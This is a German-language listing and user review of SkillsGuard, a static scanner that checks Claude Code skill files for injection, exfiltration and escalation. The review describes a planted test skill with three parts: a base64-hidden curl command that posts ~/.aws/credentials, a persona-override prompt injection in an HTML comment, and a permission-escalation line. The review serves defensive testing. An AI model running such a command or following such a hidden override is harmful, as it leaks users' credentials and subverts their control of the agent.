SkillsGuard

Statischer Scanner, der eine SKILL.md auf Injection, Exfiltration und Eskalation prüft.

von Teycir · Teycir/SkillsGuard

Funktioniert mit Setup ★ 6.8/10

SkillsGuard — Statischer Scanner, der eine SKILL.md auf Injection, Exfiltration und Eskalation prüft.

Was es kann

Betreibt den statischen Scanner SkillsGuard — 15 Regelkategorien, die Prompt Injection, Exfiltration, Command Injection, Persistenz, Privilege Escalation, Obfuscation und Supply Chain abdecken — über einen einzelnen Skill oder einen ganzen Skills-Ordner, und formatiert die Ergebnisse dann in ein nach Schweregrad gruppiertes Urteil mit einer Installations- / Nicht-Installations-Empfehlung. Er dekodiert base64 und andere obfuskierte Blobs vor dem Abgleich, sodass in kodierten Zeichenketten versteckte Payloads mit den dekodierten Beweisen gemeldet werden. Wird bei Anfragen wie scan this skill, is this skill safe oder audit my skills folder ausgelöst.

Testbericht

Die Decode-First-Engine ist das Wahre: Ich habe einen Skill platziert, dessen setup.sh `curl -X POST -d @<(cat ~/.aws/credentials)` in einem base64-Blob versteckte, und der Scanner dekodierte ihn und meldete die Exfiltration von Anmeldeinformationen, die Berechtigungserweiterungszeile in settings.json und die Persona-Override-Injection, die in einem HTML-Kommentar vergraben war — 17 Funde in 16 ms, alle drei Angriffe erfasst. Präzision ist das Problem. Auf eine echte Bibliothek von 278 installierten Skills gerichtet, wurden 15.480 Funde ausgegeben und der gesamte Ordner mit 100/100 CRITICAL bewertet, wobei 204 von 278 Skills als HIGH-oder-schlimmer eingestuft wurden; die beiden lautesten Regeln stimmen mit `rm` und `sh` ohne Wortgrenzen überein, sodass jeder Markdown-Inline-Code, der 'format' oder 'publish' enthält, als Command Injection gemeldet wird. Ein harmloser 14-zeiliger Notiz-Skill, dessen einziger Backtick `--format markdown` war, kam als MEDIUM mit fünf HIGH 'Command Injection'-Funden zurück. Er ist auch nicht auf npm — die SKILL.md allein bewirkt nichts, und man muss klonen, npm install, build und npm link (oder den MCP-Server verbinden), bevor der Skill etwas aufrufen kann. Nützlich als schnelle Vorab-Installationstriage für einen verdächtigen Skill; vertrauen Sie nicht seinem Ordner-Level-Urteil.

Getestet am: 2026-08-07 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Befehle & Beispiel-Prompts

  • /skillsguardStatischer Scanner, der eine SKILL.md auf Injection, Exfiltration und Eskalation prüft.

Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks